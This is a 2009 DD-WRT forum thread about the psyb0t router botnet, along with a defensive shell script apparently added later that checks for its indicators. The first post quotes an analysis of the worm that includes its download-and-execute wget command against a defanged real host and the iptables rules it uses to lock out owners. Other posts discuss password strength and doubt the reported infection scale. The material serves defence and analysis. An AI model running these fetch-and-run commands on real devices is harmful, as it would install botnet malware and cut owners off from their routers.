Question on which versions are exploitable by psyb0t?

rjr162
DD-WRT User


Joined: 07 Jun 2006
Posts: 63

PostPosted: Tue Mar 24, 2009 1:14    Post subject: Question on which versions are exploitable by psyb0t?
"Network Bluepill - stealth router-based botnet has been DDoSing dronebl for the last couple of weeks

We have come across a botnet worm spreading around called "psyb0t". It is notable because, according to my knowledge, it:

* is the first botnet worm to target routers and DSL modems
* contains shellcode for many mipsel devices
* is not targeting PCs or servers
* uses multiple strategies for exploitation, including bruteforce username and password combinations
* harvests usernames and passwords through deep packet inspection
* can scan for exploitable phpMyAdmin and MySQL servers

Vulnerable devices

* any linux mipsel routing device that has the router administration interface or sshd or telnetd in a DMZ, which has weak username/passwords (including openwrt/dd-wrt devices).
* possibly others

Infection strategy

Get a shell on the vulnerable device (methods vary). Once a shell is acquired, the bot does the following things:

# rm -f /var/tmp/udhcpc.env
# wget

If wget is present, then it uses wget to download hxxp://dweb.webhop.net/.bb/udhcpc.env , and runs it in the background.

If wget is not present, the bot looks for "busybox ftpget", and then tries falling back to a tftp client. Once it is downloaded, it launches it in the background. The following snippet is the variant it uses if it finds that wget is usable.

# wget hxxp://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp && chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &
udhcpc.env 100% |*****************************| 33744 00:00 ETA

It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process."

Above taken from http://dronebl.org/blog/8

Are any versions less susceptible to this Botnet worm? I remotely manage DD-WRT flashed routers on different networks I have at different locations, and would hate to lose that ability. Would it be possible to have an option near the Enable/Disable SSH to change the port number in the GUI? It would at least make it a bit harder to find as you could hide it say as a SSL port (443) or something. I know you can change the default WebGUI port, which mine already are, but a quick and simple way to change the SSH port would be fantastic as a quick solution to help against this worm.
phuzi0n
DD-WRT Guru


Joined: 10 Oct 2006
Posts: 10141

PostPosted: Tue Mar 24, 2009 1:24    Post subject:
You can change the username and use a strong password. I doubt that there's really 80,000 people using custom firmwares that all configured remote access with weak login info. They don't really explain the rest of their claims. I have a feeling what really happened is a vendor left their routers open for remote access using default login info.
the_wanderer
DD-WRT Novice


Joined: 25 Aug 2006
Posts: 31

PostPosted: Tue Mar 24, 2009 5:10    Post subject: This whole thing stinks...
After looking at the binary, something's fishy. I do think that there is a worm, but I don't think that there could be anywhere near 80K DD-WRT/OpenWRT/Tomato/Whatever MIPS based routers that have weak passwords AND remote access turned on. DD-WRT goes NUTS if you try and leave the default passwords on while turning on remote admin, and it's been that way for a while.

Something else that's weird. The DroneBL guys are claiming that it's UPX packed, but, after looking at the binary, it's just a normal MIPS binary, I don't see any real packing.

What it looks like is that *IF* you're an idiot, and *IF* you leave the default passwords on your router, and *IF* you turn on remote admin on a DD-WRT/OpenWRT/Tomato router, THEN you might have a problem..

What is also possible is that there is somebody out there using a modified embedded linux in some other device that is, by default, enabling either remote telnet or remote ssh, or remote web administration. Something like that wouldn't surprise me at.. (Ask me about the "VPN Appliance" that would forward either TCP or UDP on a port, but not both...)

I'm taking a "Wait and see" stance. I think that when all the smoke clears, there will be VERY, VERY few dd-wrt and open-wrt boxes infected.
the_wanderer
DD-WRT Novice


Joined: 25 Aug 2006
Posts: 31

PostPosted: Tue Mar 24, 2009 6:30    Post subject: More info
I intentionally infected a router with the worm. At this point in time, the DNS for the control channel server (strcpy.us.to) doesn't resolve, so even if you are a "new infection", you can't join the control channel (which doesn't appear to be giving out any orders, anyway...) however, it appears that the control channel is still up and can be joined.

Also the bit about "It then takes several steps to lock anybody out of the device, including blocking telnet, sshd and web ports.

# iptables -A INPUT -p tcp --dport 23 -j DROP
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -A INPUT -p tcp --dport 80 -j DROP

This concludes the infection process." doesn't appear to be right..

Even after I infected my router, I was able to ssh, telnet, and get into the web interface.

After starting the udhcpd.env process, it creates a zero length file called udhcpd.mtx file in the /var/tmp directory. Udhcpd.env is still a running process and can be viewed by ps, and can be killed.

It's cute. Until somebody shows me remotely exploitable mips shellcode, tho, I'm putting this in the "not much of a threat" category.
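A defender's check for the indicators the dronebl write-up quoted in the first post and the_wanderer's test above describe: the bot binary at /var/tmp/udhcpc.env (the write-up's spelling), the empty lock file beside it, the still-running process, and the DROP rules on tcp/22, 23 and 80. This is an added example, not code from the thread or from DD-WRT; the listing formats and the sample `ps` and `iptables` output are constructed, and the lock-file name is assumed to follow the binary's name.

```shell
#!/bin/sh
# Added example (not from the thread or DD-WRT): look for the psyb0t
# indicators named in the dronebl write-up and the_wanderer's test.
# Inputs are arguments so the checks run offline against captured data;
# on a router you would pass "$(ps)" and "$(iptables -L INPUT -n)".

# Bot binary /var/tmp/udhcpc.env plus the zero-length udhcpc.mtx lock file.
find_psyb0t_files() {
    root="$1"
    [ -e "$root/var/tmp/udhcpc.env" ] && echo "bot binary: $root/var/tmp/udhcpc.env"
    [ -f "$root/var/tmp/udhcpc.mtx" ] && [ ! -s "$root/var/tmp/udhcpc.mtx" ] \
        && echo "empty lock file: $root/var/tmp/udhcpc.mtx"
    return 0
}

# The bot keeps running under its file name and shows up in `ps` (and can be killed).
find_psyb0t_process() {
    printf '%s\n' "$1" | grep 'udhcpc\.env' || true
}

# Lockout rules: DROP on tcp/23 (telnet), tcp/22 (ssh), tcp/80 (web) in INPUT.
find_lockout_rules() {
    printf '%s\n' "$1" | grep -E '^DROP +tcp .*dpt:(22|23|80)( |$)' || true
}

# Total number of indicator lines across the three checks (0 = nothing found).
psyb0t_indicator_count() {
    { find_psyb0t_files "$1"; find_psyb0t_process "$2"; find_lockout_rules "$3"; } | grep -c . || true
}

# Constructed sample listings mimicking an infected box (not captured data).
SAMPLE_PS='  PID USER       VSZ STAT COMMAND
    1 root      1340 S    init
  412 root      2816 S    /var/tmp/udhcpc.env'
SAMPLE_IPT='Chain INPUT (policy ACCEPT)
target     prot opt source               destination
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:23
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:22
DROP       tcp  --  0.0.0.0/0            0.0.0.0/0           tcp dpt:80
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0           state RELATED,ESTABLISHED'

# Offline run: a scratch root holding the two files plus the samples above.
demo_root=$(mktemp -d)
mkdir -p "$demo_root/var/tmp"
: > "$demo_root/var/tmp/udhcpc.env"
: > "$demo_root/var/tmp/udhcpc.mtx"
echo "indicators found: $(psyb0t_indicator_count "$demo_root" "$SAMPLE_PS" "$SAMPLE_IPT")"
rm -rf "$demo_root"
```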
ackray
DD-WRT User


Joined: 11 Mar 2009
Posts: 189

PostPosted: Tue Mar 24, 2009 7:02    Post subject: Re: This whole thing stinks...
the_wanderer wrote:

What is also possible is that there is somebody out there using a modified embedded linux in some other device that is, by default, enabling either remote telnet or remote ssh, or remote web administration. Something like that wouldn't surprise me at.. (Ask me about the "VPN Appliance" that would forward either TCP or UDP on a port, but not both...)

I'm taking a "Wait and see" stance. I think that when all the smoke clears, there will be VERY, VERY few dd-wrt and open-wrt boxes infected.


I'm guessing it is probably some kind of set top box or a multimedia device where security was an afterthought.
hajj_3
DD-WRT User


Joined: 01 Oct 2006
Posts: 58

PostPosted: Tue Mar 24, 2009 13:10    Post subject:
hope you guys can create a patched dd-wrt v24 sp1 within the next few days to fix the flaws in the firmwares:)
soulstace
DD-WRT Guru


Joined: 04 Aug 2007
Posts: 6427

PostPosted: Tue Mar 24, 2009 13:30    Post subject:
hajj_3 wrote:
hope you guys can create a patched dd-wrt v24 sp1 within the next few days to fix the flaws in the firmwares:)


"You can't fix stupid"

the_wanderer wrote:
What it looks like is that *IF* you're an idiot, and *IF* you leave the default passwords on your router, and *IF* you turn on remote admin on a DD-WRT/OpenWRT/Tomato router, THEN you might have a problem..
barryware
DD-WRT Guru


Joined: 26 Jan 2008
Posts: 13049
Location: Behind The Reset Button

PostPosted: Tue Mar 24, 2009 13:33    Post subject:
soulstace wrote:
hajj_3 wrote:
hope you guys can create a patched dd-wrt v24 sp1 within the next few days to fix the flaws in the firmwares:)


"You can't fix stupid"

the_wanderer wrote:
What it looks like is that *IF* you're an idiot, and *IF* you leave the default passwords on your router, and *IF* you turn on remote admin on a DD-WRT/OpenWRT/Tomato router, THEN you might have a problem..


Razz

LOM
DD-WRT Guru


Joined: 28 Dec 2008
Posts: 7647

PostPosted: Tue Mar 24, 2009 13:34    Post subject:
hajj_3 wrote:
hope you guys can create a patched dd-wrt v24 sp1 within the next few days to fix the flaws in the firmwares:)


If something should be done to V24 sp1, then that is pulling it off the download section. Rolling Eyes
flypaper
DD-WRT User


Joined: 28 Nov 2007
Posts: 84

PostPosted: Tue Mar 24, 2009 13:44    Post subject: Re: This whole thing stinks...
the_wanderer wrote:
After looking at the binary, something's fishy. I do think that there is a worm, but I don't think that there could be anywhere near 80K DD-WRT/OpenWRT/Tomato/Whatever MIPS based routers that have weak passwords AND remote access turned on. DD-WRT goes NUTS if you try and leave the default passwords on while turning on remote admin, and it's been that way for a while.

Something else that's weird. The DroneBL guys are claiming that it's UPX packed, but, after looking at the binary, it's just a normal MIPS binary, I don't see any real packing.

What it looks like is that *IF* you're an idiot, and *IF* you leave the default passwords on your router, and *IF* you turn on remote admin on a DD-WRT/OpenWRT/Tomato router, THEN you might have a problem..

What is also possible is that there is somebody out there using a modified embedded linux in some other device that is, by default, enabling either remote telnet or remote ssh, or remote web administration. Something like that wouldn't surprise me at.. (Ask me about the "VPN Appliance" that would forward either TCP or UDP on a port, but not both...)

I'm taking a "Wait and see" stance. I think that when all the smoke clears, there will be VERY, VERY few dd-wrt and open-wrt boxes infected.


Did I miss somewhere where it said that ALL 80-100k were DD-WRT? And read the update about UPX packing...
marcmerlin
DD-WRT Novice


Joined: 20 Apr 2008
Posts: 43

PostPosted: Tue Mar 24, 2009 14:06    Post subject:
LOM wrote:
hajj_3 wrote:
hope you guys can create a patched dd-wrt v24 sp1 within the next few days to fix the flaws in the firmwares:)


If something should be done to V24 sp1, then that is pulling it off the download section. Rolling Eyes


Patched against what? Read this thread again before replying, so far there is no evidence that anything is wrong with dd-wrt, that any fix is needed, or that pulling it off the download section is necessary.

It's just a news article low on details, and potentially partially incorrect.

Marc
freonchill
DD-WRT Guru


Joined: 17 Jul 2006
Posts: 2055

PostPosted: Tue Mar 24, 2009 14:13    Post subject:
unless you want them to make it to ignore the commands 'to drop all http,ssh,telnet'

pretty much just make a STRONG password
e.g. username isn't default (8+ characters)
password has alpha, numeric, and special characters if accepted (8+ characters)

perhaps use https://www.grc.com/passwords.htm

PS: don't know the dd-wrt max username and password length, so please test before doing it remotely.

the_wanderer
DD-WRT Novice


Joined: 25 Aug 2006
Posts: 31

PostPosted: Tue Mar 24, 2009 14:19    Post subject: Something's still not adding up...
They've updated the info on the webpage, and included this statement:

"* Your username and password combinations are weak, OR the daemons that your firmware uses are exploitable.

As such, 90% of the routers and modems participating in this botnet are participating due to user-error (the user themselves or otherwise). Unfortunately, it seems that some of the people covering this botnet do not understand this point, and it is making us look like a bunch of idiots."

They're saying they've got mips shellcode, but they're not saying for what service. So until this little piece of info comes out, just wait and see.

Personally, it still has not been proved to me that it's not a "Don't leave the default passwords on your crap then turn on remote admin" problem, which is security 101.
the_wanderer
DD-WRT Novice


Joined: 25 Aug 2006
Posts: 31

PostPosted: Tue Mar 24, 2009 14:24    Post subject: While I can't prove it...
I have a strange feeling that most of the infected devices are DLink DSL modems of some variant.
LOM
DD-WRT Guru


Joined: 28 Dec 2008
Posts: 7647

PostPosted: Tue Mar 24, 2009 14:49    Post subject:
marcmerlin wrote:
LOM wrote:
hajj_3 wrote:
hope you guys can create a patched dd-wrt v24 sp1 within the next few days to fix the flaws in the firmwares:)


If something should be done to V24 sp1, then that is pulling it off the download section. Rolling Eyes


Patched against what? Read this thread again before replying, so far there is no evidence that anything is wrong with dd-wrt, that any fix is needed, or that pulling it off the download section is necessary.

It's just a news article low on details, and potentially partially incorrect.

Marc


I know.
I think the V24 sp1 should be pulled for other reasons, almost half of all user problems are due to that buggy version.